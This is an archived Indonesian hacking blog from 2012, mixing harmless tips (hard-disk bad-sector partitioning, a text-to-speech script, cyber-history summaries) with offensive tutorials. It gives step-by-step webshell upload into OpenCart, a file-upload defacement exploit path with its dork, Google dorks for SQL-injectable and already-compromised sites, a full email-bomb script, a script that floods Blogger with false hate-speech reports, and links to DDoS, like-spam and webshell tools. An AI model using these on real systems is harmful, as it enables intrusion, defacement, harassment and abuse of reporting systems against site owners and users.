MeNinBoX Zone: September 2012

Kamis, 27 September 2012

Upload shell di CMS Opencart

Masih banyak teman2 yg masih belum bisa untuk upload shell.

target kita www.targetopencart.com/admin. login dulu sebelumnya :

kalo udah masuk kita klik aja menu catalog ---> downloads

klik insert.

nah...sebelum upload shell kita hrs rename shell kita dulu (shell.php.nomertoken)

nomer token bisa diliat di address barnya

jangan lupa kolom Download Name -nya dikasih nama terserah kalian.

kalo sudah upload shellnya skrg kita buka aja di :
www.targetopencart.com/download/namashell.php.nomertoken.

JRRRRRREEEEEEENNNGGG....masuk kan shell kita.

Ok sekian..
Happy Hacking.

Kamis, 20 September 2012

Mengakali Hardisk Yang Bad Sector Tanpa Repair menggunakan Hiren's BootCD

Hardisk bad sektor memang menjadi masalah umum pada hardisk yang menggunakan platter atau piringan, menggunakan konstruksi mekanik yang rentan terhadap kerusakan seperti suhu, guncangan, dsb. Salah satu kerusakan yang sering dialami adalah bad sector yang dapat menyebabkan proses baca tulis data ke hardisk menjadi terganggu bahkan sampai gagal. Banyak tool untuk recovery bad sector, namun dalam kondisi bad sektor yang sudah parah itu memakan proses yang sangat-sangat lama menyampai hitungan hari dan tool-tool untuk perbaikan bad sector pun tidak gratis. Nah, solusi yang tepat adalah tetap bisa menggunakan hardisk tersebut, yaitu dengan mengabaikan area hardisk yang bad sector dan hanya menggunakan sector-sector yang bagus. disini hardisk dengan kondisi yang sudah cukup parah dengan kegagalan hardisk (imminent failure) yang telah dideteksi SMART pada hardisk dengan 2000 lebih bad sector, namun tetap bisa digunakan tanpa gangguan dengan cara ini, berikut langkahnya.

Kondisi:

Hardisk dengan kapasitas 250GB, kapasistas sesungguhnya sekitar ~230GB
Masih terdeteksi(tidak rusak secara hardware) dan masih dapat digunakan namun terdapat bad sector yang menyebar atau sporadis, namun memiliki jangkauan.
Kondis awal sistem operasi berjalan sangat-sangat lambat karena file-file sistem operasi diinstall atau berada tepat pada posisi bad sector, sehingga kecepatan baca dan tulis hard disk sangat lambat.

Yang dibutuhkan:

Tentu saja Hiren’s BootCD, tool-tool yang digunakan semuanya ada didalamnya, disini yang digunakan versi 11.0, untuk mendownload silahkan menuju Link1. Untuk versi terbarunya silahkan menuju Link2.
Siapkan Hiren’s BootCD yang telah diburning ke CD

Langkah yang dilakukan

Membackup data penting ke penyimpanan luar dengan menggunakan mini Windows XP.

Boot melalui CD atau flashdisk yang berisi Hiren’s BootCD.
Pilih mini Windows XP.
Jika telah masuk ke miniXP, backup atau copy seluruh data penting dan yang masih bisa diselamatkan ke penyimpana luar seperti hard disk eksternal atau flashdisk dsb, gunakan tool-tool lainnya untuk mengcopy data yang ada pada Hiren’s jika kesulitan mengcopy data pada posisi bad sector.

Melakukan Write Zeros pada hardisk menggunakan Western Data Lifeguard, PARTISI dan DATA AKAN DIHAPUS SELURUHNYA.

Klik Start -> HBCD Menu -> Hardisk -> Western Digital Data Lifeguard Diagnostic.
Klik kanan hard disk -> Run Diagnostic -> Write Zeros -> Fast.

Melakukan test surface atau tes permukaan hardisk menggunakan HDD Tune, untuk mengetahui posisi ok atau bad pada sector hardisk.

Pilih Start -> HBCD Menu -> Hardisk -> HDD Tune.
Pilih tab Error Scan -> Klik Start (jangan centang quick scan agar bad sector dapat ditemukan).
Tunggu sampai selesai, kemudian tekan print screen pada keyboard atau klik icon Copy Screen Shot to Clip Board untuk mendapatkan gambaran kondisi hardisk.
Buka pada program IrvanView Image Editor, Klik Start -> Programs-> IrvanView Image Editor, pilih File -> Paste atau Ctrl+v.
SIMPAN GAMBAR, agar dapat dilihat kembali nanti.

Menghitung posisi atau range hardisk yang masih dapat digunakan dan yang tidak.

Buka dan analisa gambar hasil scan tadi. Kondisi yang bad memang hanya 2,3% namun menyebar dan menghabiskan sekitar 80-90 GB range hardisk. Pada awal dan akhir bad sector (blok warna merah) itu tidak mungkin digunakan lagi karena kemungkinan data hilang dan ketidakstabilan proses baca dan tulis data akan terjadi pada posisi itu. Sekarang bagaimana cara menghitung rangenya??? Berikut caranya.

Jumlah blok(yang warna hijau dan merah) keseluruhan untuk menampilkan kondisi hardisk ada 50×50 atau 2500 blok atau kotak, dan total keseluruhan kapasitas hardisk pada Position yaitu 238378MB(tergantung kapasistas hardisk), jadi untuk mendapat berapa kapasitas hardisk per 1 blok/kotak, cara menghitungnya yaitu total keseluruhan kapasitas hardisk dibagi dengan jumlah blok keseluruhan. Jadi: 238378 MB / 2500 = 95,3512MB
Maka untuk setiap kotak-kotak kapasitasnya 95,3512MB, walaupun sudah ditampilkan 95MB pada Legend namun agar perhitungannya tidak meleset 1kb pun maka perlu lebih presisi, dengan menghitungnya sendiri.

Sekarang hitung jumlah blok hijau dari posisi awal sampai posisi sebelum yang berwarna merah(posisi aman atau OK), hitung dengan baris x kolom, disini jumlah bloknya 9×50-1 = 449 blok.
Untuk yang kondisi bad(dari blok merah awal ke blok merah akhir) dan tidak akan dipakai atau dibuang, 18×50-17=883 blok.
Sisanya di bawah bad sector(hijau semua, pasti ok) yang masih aman yaitu 2500-(883+449) = 1168 blok.
Sekarang hitung berapa gigabyte blok-blok tersebut untuk mengetahui kapastas partisi sebenarnya yang akan dibuat partisi nanti, dengan perkalian kapasitas dalam MB/blok dengan Jumlah Blok, disini kita telah dapat kapasitas per blok adalah 95,3512MB atau sekitar ~95MB, jadi.
Perhitungannya.

Partisi 1 = 449 x 95,3512 MB = 42812,69 MB atau ~42,8 GB
Partisi 2 = 883 x 95,3512 MB = 84195,11 MB atau ~84,1 GB
Partisi 3 = 1168 x 95,3512 MB = 111370,20 MB atau ~111,3 GB

Membuat partisi berdasarkan range-range yang telah dihitung.

Buka Partition Wizard Home Edition, klik Start -> HBCD Menu -> Partition, buat partisi sesuai dengan perhitungan diatas.
disini saya membuat 3 buah partisi semuanya tipenya: Primary, filesystem: NTFS, ukurannya diinput dengan satuan MegaByte sesuai perhitungan.
Sekarang ada 3 partisi selanjutnya DELETE partisi yang berisi bad sector, disini adalah partisi 2 yang kapasitasnya 84195,11 MB.
Kondisi terakhir hardisk adalah dengan 2 partisi yang dapat digunakan dan 1 unallocated space(bad sector).

Menginstall sistem operasi pada sektor paling aman dari bad sector.

Selanjutnya tinggal mengganti drive letter 2 partisi yang ada, disini saya menggunakan partisi terakhir sebagai tempat menginstall sistem operasi, dan mengubah drive letter partisi terakhir dengan C: dan partis pertama dengan D.
Jika masih ingin membagi partisi terakhir menjadi 2 bagian juga bisa, namun ingat batasan untuk partisi Primary dalam satu hardisk adalah 4.
disini saya membagi dua partisi terakhir menjadi dua bagian, sehingga partisi yang ada sekarang 3 buah dan satu Unallocated.

Hasilnya setelah di partisi dan diinstall Sistem Operasi.

Selamat mencoba.

sumber : http://untukkami.wordpress.com

Sabtu, 15 September 2012

Mencari Halaman Admin

Alangkah jengkelnya kita kalo sudah melakukan aktifitas hacking, username dan passwordnya dr sebuah web yang kita inject sudah di tangan, tp ternyata kita kesusahan untuk mencari halaman admin.

Ya...standartnya sih di
/admin
/administrator
/admin.php
/login.php

tp kalo halaman diatas ternyata msh g mempan juga, coba gunain script perl ini ~~(meski sudah banyak tool yg bertebaran di mbah google, tp ane msh suka dgn script ini)~~

Download dl perl nya di : activeperl
lalu instal (khusus untuk OS backTrack perl sudah terinstal)

kalo udah selesai kita download script admin.pl nya di :
password : surabayahacker

simpan file admin.pl nya di folder perl yaitu : c:/perl/bin

nah..skrg saatnya menjalankan scriptnya.

perl admin.pl

screenshoot :

masukkan nama sitenya

setelah itu akan keluar pilihan bahasa pemogramannya, pilih aja "any"

tinggal nunggu aja hasilnya :

Sabtu, 08 September 2012

Cara Mengikat Wanita Idaman Anda

Aku bisa membuatmu jatuh cinta kepadaku meski kau tak cinta.........kepadaku.... "Risalah hati - Dewa19"

Artikel ini terinspirasi dari teman2 saya yang pada suka diputusin ceweknya.

Apakah benar, bahwa pengorbanan mati-matian adalah cara yang terbaik untuk mendapatkan cinta seorang wanita?

kok kayaknya itu CARA LAMA dan TIDAK ADIL..!!

Jika itu CARA LAMA yang TIDAK ADIL, adakah CARA BARU yang ADIL, MUDAH dan MENGUNTUNGKAN?

Pria 80% mengambil keputusan berdasarkan LOGIKA
Wanita 80% mengambil keputusan berdasarkan EMOSI

Oleh karena itu JANGAN PERNAH menyakinkan wanita untuk bisa TERTARIK dengan anda SECARA LOGIKA

Mau baca lebih lengkap ebook diatas.
Download aja ebook yang ditulis oleh si pujangga wanita RONALD FRANK
Download Cara Memikat Wanita Idaman Anda (pass : surabayahacker)

Notes : jgn cuman dibaca masbrow..tp di praktekin.
AWAS...siap2 cewek2 kamu bertekuk lutut.

Deface untuk Newbie

Kali ini saya akan membagikan trik upload deface dengan mudah, dimana bug ini akibat kesalahan pada si developerscms itu sendiri.

Ok..langsung aja

Dork
inurl:/editor/tmedit/popups

Exploit path
/editor/tmedit/popups/InsertFile/insert_file.php

Screenshoot :

upload file deface kamu (.htm) dan liat hasilnya di : http://www.target.com/uploadfiles/filedefacekamu.html

Nah...mudah kan?

Sekian tutorial dari saya.

Kamis, 06 September 2012

The Real Hacker

Secara g sengaja saya menemukan situs website yang berasa saya bener2 jadi seorang hacker sejati.

nih situsnya : http://www.hackertyper.com/

Tugas kalian hanyalah mengetikan tombol apa saja pada keyboard, secara otomatis kode-kode yang belum kita kenal akan muncul. Background hitam dan font yang berwarna hijau menghiasi website tersebut.

Screenshotnya :

Hehehe, gimana udah berasa jadi Hacker? yaa... walaupun hanya sebuah rekayasa, tapi yang penting kita udah bisa merasakan jadi seorang hacker :D

Facebook Like Bot

This Facebook Like Spammer comes with the following features
Delay Time(In Miliseconds)
Max Like Count
Unlike All Posts
Opening of Older Posts

New Features
Bug Fixes
Speed Improvments
Delay Time Countdown
Poke All Function Added
Poke Profile on Load Function Added
Hide Facebook Ads Function Added
Max Like Count Improved
Delay is better handled to not FREEZE the application.
New Window Handled Faster
Favorite Links Handled
Custom Color Theming
Color Picker
NEW IMPROVED METHODS FOR RETRIEVING HTML ELEMENTS
Fast Older Posts Expander
Cleaner Code meaning Smaller Size and Faster

I recommend a delay around 3 seconds or longer. If you spam to quickly, Facebook will monitor your liking, and temporary ban you from the liking system.

Download : http://www.mediafire.com/download.php?n3hf08bc9wjcp90
password : surabayahacker

DDOS Good Bye V. 5.0

Berikut ini salah satu tool untuk ddos

nih SS nya :

Download : http://www.mediafire.com/?kpky89h5d3u6dd4
pass : surabayahacker

Kalo ada sempet yuk kita share bareng kegunaan dan cara pemakaiannya. pasti akan ane share disini.

Lenyapkan blog yang menghina Indonesia

Begitu banyaknya blog yang (entah dibuat oleh siapa) menghina Negara kita Indonesia, tentu saya sebagai orang indonesia sangat geram dengan perlakuan ini.

Daripada saya ikut berkomentar tidak jelas di blog itu, tentunya saya lebih baik memikirkan bagaimana blog tersebut hilang selamanya.Dan saya pun memilih untuk menggunakan program buatan master kita Gunslinger

"domainreporter.py"

Program ini akan otomatis mereport ke google karena site tersebut sangat mengandung hate speec, saya berharap akan lenyap karena telah di report ke database dalam jumlah banyak
tentunya lebih membantu jika teman2 ikut menjalankan program ini

Pertama kita install dulu Python versi 2.7 : http://www.activestate.com/activepython/downloads#

Setelah terinstal di C:\python27 , kita harus instal juga multipartposthandler.
berikut perintahnya :

pypm install multipartposthandler

setelah sukses instal multipartposthandlernya, kita bs edit sedikit domain yg akan di report ke google :

berikut codenya :

#!/usr/bin/python
# programmer : gunslinger_
# please use this tools to vanish that domain, i hope google responds this !
# this program is defeated form encryption multipart/form-data
# so you need to install http://pypi.python.org/pypi/MultipartPostHandler/0.1.0 python module
# tips :
# - extract the folder
# - python setup.py build
# - sudo python setup.py install
# then program ready to rock !
import urllib2, random, sys
try:
   import MultipartPostHandler
except ImportError:
   print "[*] Please install MultipartPostHandler first"

def main():
   try:
       domain       = ['http://indonbodoh.blogspot.com/',
               'http://indoncelaka.blogspot.com/',
               'http://ihateindon.blogspot.com/',
               'http://dontvisitindon2008.blogspot.com/',
               'http://kamiantiindon.blogspot.com/',
               'http://arezeo.blogspot.com/',
               'http://sayabenciindon.blogspot.com/',
               'http://www.penipuan-jawa.blogspot.com/'
               ]
       ouruseragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
               'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1',
               'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
               'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
               'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
                   'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
                   'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
                   'Microsoft Internet Explorer/4.0b1 (Windows 95)',
                   'Opera/8.00 (Windows NT 5.1; U; en)',
               'amaya/9.51 libwww/5.4.0',
               'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
               'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
               'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
               'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
               'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
               'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]']
       success = 'Thanks for reporting this possible Terms of Service violation. We will examine it soon and take action as necessary.'
       opener    = urllib2.build_opener(MultipartPostHandler.MultipartPostHandler)
       counter = 1
       while 1:
           opener.addheaders = [('User-agent', random.choice(ouruseragent))]
           params = { 'extra.blog_URL' : random.choice(domain)
               }
           openserver = opener.open('http://www.google.com/support/blogger/bin/request.py?hl=en&ctx=submitted&confirm=hate_speech', params)
           result = openserver.read()
           if success in result:
               sys.stdout.write("%s[*] %s way success reporting domain %s to google ! %s" % ("\r", int(counter), params['extra.blog_URL'], " "*80))
               sys.stdout.flush()
           else:
               print "[*] Failed ! please try again !"
               sys.exit(1)
           counter = int(counter) + 1
   except KeyboardInterrupt:
       print "\n[*] Exiting program\n"
       sys.exit(1)
   except urllib2.HTTPError:
       print "\n[*] Connections problem, please try again !\n"
       sys.stdout(1)

if __name__ == '__main__':
   print "domainreporter.py"
   print "gunslinger_ "
   print "edited by MeNinBoX"
   main()

tampilannya :

Menjalankan TOR Browser di Backtrack 5 R3

Ok sekarang saya akan berikan Tutorial Install TOR Browser di Backtrack 5.
Jika ada yang masih belum tau TOR Browser itu apa sih? nih penjelasannya : Review Tor Browser Bundle.

Sekarang kita download dl file tar.gz nya : https://www.torproject.org/download/download

kalo sudah yuk kita extrack file nya :

tar -zvxf namafile.tar.gz

kalo sudah akan terbuat nama folernya, terdapat nama file "start-tor-browser", yuk kita klik 2X filenya.

ups...muncul error : The Tor Browser Bundle should not be run as root. Exiting.

kita bypass aja errornya dgn cara seperti ini :

klik kanan file "start-tor-browser" dan kita edit source nya.
cari [ctrl+f] pesan errornya lalu ubah dengan kalimat "Running TOR in Root"
lalu hapus tulisan "exit 1". Kalo msh bingung nih gambarnya :

ubah menjadi seperti ini :

dan simpan.

Ok...sekarang kita jalankan lagi file "Start Tor Browser".

akan muncul popup "Running TOR in Root" klik ok aja.
Trala.....TOR berjalan tanpa error.

Enjoy..!!

Keep Anonymous Brothers.

CYBER TV

Rampas Korban Hacking Symlink

Makin banyaknya korban Deface, tentu merupakan langkah selanjutnya dalam dunia security website dunia, dengan trick symlink yang telah beredar ini maka makin banyak korban yang bisa berjatuhan, hanya bermodalkan 1 website, maka website dalam 1 server bisa di rampas, sebelumnya para cracker masih mengandalkan trik jumping yang bisa mengambil alih website lain yang satu IP dengan victim nya.

Makin berkembangnya bentuk serangan maka makin lemahnya jutaan website yang ada didunia maya ini, artikel ini saya tulis selain berbentuk trik, tapi juga dengan kritikan untuk para cracker yang tidak mampu dalam melakukan modifikasi bentuk serangan yang mereka pelajari, padahal dengan melakukan modifikasi sesuai dengan kreatifitasan mereka, maka bentuk serangannya makin sulit di kenali oleh lamers seperti saya, karena mereka hanya menjalankan apa yang tertera pada POC Author teknik tersebut, maka mereka melakukan hal yang sama bahkan hampir 100% kemiripannya.
jadi menurutku, sangat mudah menebak, siapa saja yang jadi korban trik ini, dengan mengandalkan majalah google, kita sudah bisa menemukan korbannya...

kenapa demikian? karena mereka tidak mengerti apa sebenarnya yang mereka lakukan, mereka membuka pintu, tapi tidak bisa atau lupa menutup pintu tersebut, maka user google juga bisa masuk tanpa harus alami kesulitan. why??? karena Attacker nya sendiri yang salah, seperti yang tadi saya bilang, ibarat, membuka pintu dengan perintah sihir (Alakazamm Buka Pintu) tapi tidak menyebutkan perintah (Alakazam Tutup Pintu) orang yang kebetulan melintas, yah bisa masuk lah, dan bisa ikut menjarah didalamnya...
itupun kalau bukan Admin yang nutup pintunya, bakal tetap terbuka... terus bagaimana cara mengintip para korban Symlink? yah, cukup anda bermain Dork Google

Dork :
inurl:"sym/root/home/
inurl:"?sws=sym"
inurl:"sym.php"
inurl:"symlink.php"
intitle:"Symlink_Sa 2.0"
intitle:"Symlink_Sa 2.0 - "
intitle:"Symlink_Sa"

Thanks to My Friend "President"

3 Kalimat Terlarang (Motifasi buat kita)

Tulisan ini saya kutip dari tmn saya Jerry Maheswara (X-Code)

Tiga Kalimat Terlarang:
1. Saya tidak bisa
2. Itu tidak mungkin
3. Saya sudah tahu

Tiga kalimat ini akan bekerja secara otomatis mempengaruhi OTAK kita, jadi berhati-hatilah...!!!

Efek samping:
1. Pesimis
2. Putus asa
3. Malas belajar
--

Pengganti:
1. Saya pasti bisa
2. Itu sangat mungkin
3. Saya masih perlu belajar lagi

Nikmatilah cara kerja OTAK kita dengan benar, dan rasakan dorongan positifnya:
1. Selalu optimis
2. Pantang menyerah
3. Semangat untuk belajar

===================
Thanks

Best Regards,

Jerry Maheswara

Embed lagu untuk maling

download this script :
http://www.mediafire.com/?xknidreuir7rmi7

bommail.py

Bom Email. Ditulis menggunakan bahasa Python.
Dijamin masuk di Inbox target.
Pergunakan dengan bijak !!!

#!/usr/bin/python
#pybombmail.py by aBi71
#This code for education purpose only.
#Edited by MeNinBoX from Surabaya BlackHat
#Use it at your own risk !!!

import os
import smtplib
import getpass
import sys

server = raw_input ('Server Mail: ')
user = raw_input('Username: ')
passwd = getpass.getpass('Password: ')

to = raw_input('\nTo: ')
#subject = raw_input('Subject: ')
body = raw_input('Message: ')
total = input('Number of send: ')

if server == 'gmail':
    smtp_server = 'smtp.gmail.com'
    port = 587
elif server == 'yahoo':
    smtp_server = 'smtp.mail.yahoo.com'
    port = 25
else:
    print 'Applies only to gmail and yahoo.'
    sys.exit()

print ''

try:
    server = smtplib.SMTP(smtp_server,port)
    server.ehlo()
    if smtp_server == "smtp.gmail.com":
            server.starttls()
    server.login(user,passwd)
    for i in range(1, total+1):
        subject = os.urandom(9)
        msg = 'From: ' + user + '\nSubject: ' + subject + '\n' + body
        server.sendmail(user,to,msg)
        print "\rTotal emails sent: %i" % i
        sys.stdout.flush()
    server.quit()
    print '\n Done !!!'
except KeyboardInterrupt:
    print '[-] Canceled'
    sys.exit()
except smtplib.SMTPAuthenticationError:
    print '\n[!] The username or password you entered is incorrect.'
    sys.exit()

Videonya jg sudah saya buat sendiri : http://youtu.be/Cmn2GBhWtJQ

5 Peristiwa Cyber Terdahsyat Sepanjang Sejarah Dunia

Seluruh dunia kini sangat tergantung dengan komputer. Segala sistem kini telah terkomputerisasi, mulai dari perbankan, perdagangan, perbelanjaan, telekomunikasi, maupun informasi. Ini membuat kita di seluruh dunia sangat rentan terhadap serangan cyber.
Oleh karenanya, perang cyber yang dipicu oleh tekanan dan penangkapan terhadap pendiri situs WikiLeaks cukup mengkhawatirkan. Pasalnya, para hacker pendukung WikiLeaks kemudian membidik perusahaan-perusahaan penyedia layanan keuangan seperti paypal, Mastercard, dan Visa, sehingga transaksi keuangan dan perdagangan online melalui layanan-layanan tersebut bisa terganggu.
Berikut ini, berbagai peristiwa cyber terbesar yang tercatat oleh sejarah, yang dicatat oleh situs Discovery:

1. Serangan Worm Stuxnet (2010)
Serangan worm Stuxnet banyak dipandang oleh para pakar sebagai salah satu serangan terbesar yang melibatkan kode program yang sangat kompleks.
Serangan worm ini memanfaatkan berbagai macam celah yang ada di sistem operasi Windows yang belum banyak diketahui, dan mengincar sistem industri yang mengendalikan berbagai perangkat mesin di instalasi pembangkit listrik maupun di pabrik-pabrik.
Tak salah bila banyak yang curiga bahwa worm ini didalangi oleh pihak yang besar, bahkan disponsori oleh negara besar, dalam hal ini adalah negara barat.
“Level serangan seperti ini hanya bisa dilakukan oleh pemerintahan sebuah negara, atau sebuah entitas yang didukung oleh pendanaan luar biasa,” kata Paul Royal, pakar TI dari Georgia Institute of Technology.
Iran menjadi negara yang paling banyak tertular oleh worm ini, dan banyak yang curiga, pihak barat sengaja ingin melumpuhkan pembangkit nuklir Bushehr dengan worm ini.

2. Operasi Aurora (2009)
Pada 2009, sekitar 30 perusahaan besar termasuk Google dan Adobe Systems, dikabarkan menjadi korban serangan cyber yang sangat rumit. Para hacker berhasil mencuri properti intelektual dari perusahaan-perusahaan tadi dengan memanfaatkan celah keamanan pada browser Internet Explorer.
Vice President of Threat Research McAfee, Dmitri Alperovitch mengatakan bahwa ia menemukan kata ‘Aurora’ pada direktori file di komputer penyerang, saat melakukan pelacakan dari komputer yang telah terinfeksi. Dipercaya, hacker menamakan Aurora sebagai nama operasi ini.
Peresmian laman Google di China pada April 2006
“Pada kasus Aurora ini, mereka tidak menginginkan uang. Mereka mengincar repositori sistem proprietari dan properti intelektual yang dimiliki oleh perusahaan-perusahaan serta kode sumber sistem yang merupakan hal yang terpenting dimiliki oleh perusahaan-perusahaan ini,” kata Alperovitch.
Tak cuma orang-orang yang bekerja pada perusahaan multinasional yang harus berhati-hati dengan upaya intrusi ini, namun beberapa tokoh oposisi China juga diincar. Dari dokumen yang dibocorkan oleh Wikileaks, serangan ini diinstruksikan oleh seorang petinggi di pemerintahan China.

3. Sentral Komando AS (2008)
Pada 2008 Departemen Pertahanan AS, mendapat serangan. Sumbernya: sebuah USB flash drive yang tidak berwenang yang diselipkan ke salah satu laptop di sebuah markas militer AS di Timur Tengah.
Flash disk tersebut mengandung kode berbahaya yang dikembangkan oleh intelijen asing dan menyebar melalui sistem komputer Departemen Pertahanan AS dan menyebabkan data dikirim ke server asing.
Serangan militer lainnya yang dilakukan melalui media portabel adalah peristiwa penyalinan 250 ribu data memo diplomatik AS dan video serangan heli Apache pasukan AS terhadap sekelompok sipil oleh Prajurit Satu Bradley Manning ke dalam CD Lady Gaga dari salah satu markas militer AS di Irak.

4. Georgia (2008)
Pada 2008 Rusia dan Georgia terlibat konflik di Ossetia Selatan. Serangan cyber melumpuhkan beberapa situs pemerintah Georgia dan situs-situs media lokal, setelah Georgia menyerang Ossetia Selatan. Ini merupakan serangan yang mirip dengan serangan ke Estonia pada 2007.
Serangan terhadap Georgia juga dilakukan menggunakan metoda Distributed Denial of Service. Siapapun dalang serangan ini sepertinya telah mengembangkan botnet, di mana masyarakat bisa mengunduhnya untuk membantu serangan terhadap situs-situs Georgia.

5. Estonia (2007)
Estonia menghadapi gelombang serangan cyber yang melanda segenap infrastruktur internet negara itu, mulai dari situs-situs pemerintahan, perbankan, hingga situs-situs surat kabar lokalnya.
Serangan ini terjadi bersamaan dengan perseteruan antara Estonia dan Rusia terkait dengan rencana pemindahan makam Tallinn oleh pemerintahan Estonia. Para analis media menyebut konflik ini sebagai perang cyber pertama. Namun, pihak Rusia sendiri membantah bahwa serangan-serangan terhadap Estonia dilancarkan oleh pemerintah Rusia.

sumber : http://www.ex-trick.co.cc/2010/12/5-peristiwa-cyber-terdahsyat-sepanjang.html

Update Shell b374k kamu

Silahkan update shell b374k kamu disini : http://code.google.com/p/b374k-shell/

ada 3 versi :

1. Source
ini source codenya dengan sedikit komentar/keterangan didalamnya,
download ini jika ingin membuat modifikasi b374k shell sendiri

2. Minified
ini b374k shell yang sudah dikecilkan ukurannya

3. Polymorphic
ini b374k shell yg sudah di embed code untuk fungsi polymorphic

Semoga bermanfaat

Makasih sahabatku dan guruku om ketek

Daftar algoritma jenis Password

Secrets of a super hacker. (.pdf)

Mungkin bermanfaat.

http://www.mediafire.com/view/?fe13hvhbgkxwacb

pass : surabayahacker

Membuat komputermu berbicara seperti Robot

Kali ini saya akan share script kecil yang akan membuat komputermu berbicara seperti robot.
Trik ini sebenarnya sudah lama, cuman...sapa tau msh ada yg blm tau.

berikut scriptnya :
=====================================

Dim Message, Speak
Message=InputBox("Enter Text to Talk o","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message

=====================================

simpan di notepad dan rename terserah kalian asal formatnya .vbs

double klik file vbs nya dan isi terserah kamu...maka komputer kamu akan berbicara sesuai yg kamu tulis. (jangan lupa pakai speaker masbro)

Dan jika ingin komputermu mengulang kata2nya...tambahkan loop, berikut kodenya :

======================================

Dim message, sapi message=InputBox("Enter the text you want spoken","speak this")
set sapi=CreateObject("sapi.spvoice")
For i=1 to 10
sapi. Speak message
Next

======================================

sengaja saya set menjadi 10X pengulangan, bagaimana jika kamu set 1000?

BRISIIIIKKKK.....!!!

Mencari web vuln dari pesan error sqlnya

Dork: SQL Injection

inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()

HAPPY HACKING !!

Colorful Alphabets For Facebook Chat

Hiasi font facebook chatting anda dengan code berikut ini.

[[107015582669715]] = A
[[116067591741123]] = B
[[115602405121532]] = C
[[112542438763744]] = D
[[115430438474268]] = E
[[109225112442557]] = F
[[111532845537326]] = G
[[111356865552629]] = H
[[109294689102123]] = I
[[126362660720793]] = J
[[116651741681944]] = K
[[115807951764667]] = L
[[106596672714242]] = M
[[108634132504932]] = N
[[116564658357124]] = O
[[111669128857397]] = P
[[107061805996548]] = Q
[[106699962703083]] = R
[[115927268419031]] = S
[[112669162092780]] = T
[[108983579135532]] = U
[[107023745999320]] = V
[[106678406038354]] = W
[[116740548336581]] = X
[[112416755444217]] = Y
[[165724910215]] = Z

Happy Chatting

Pages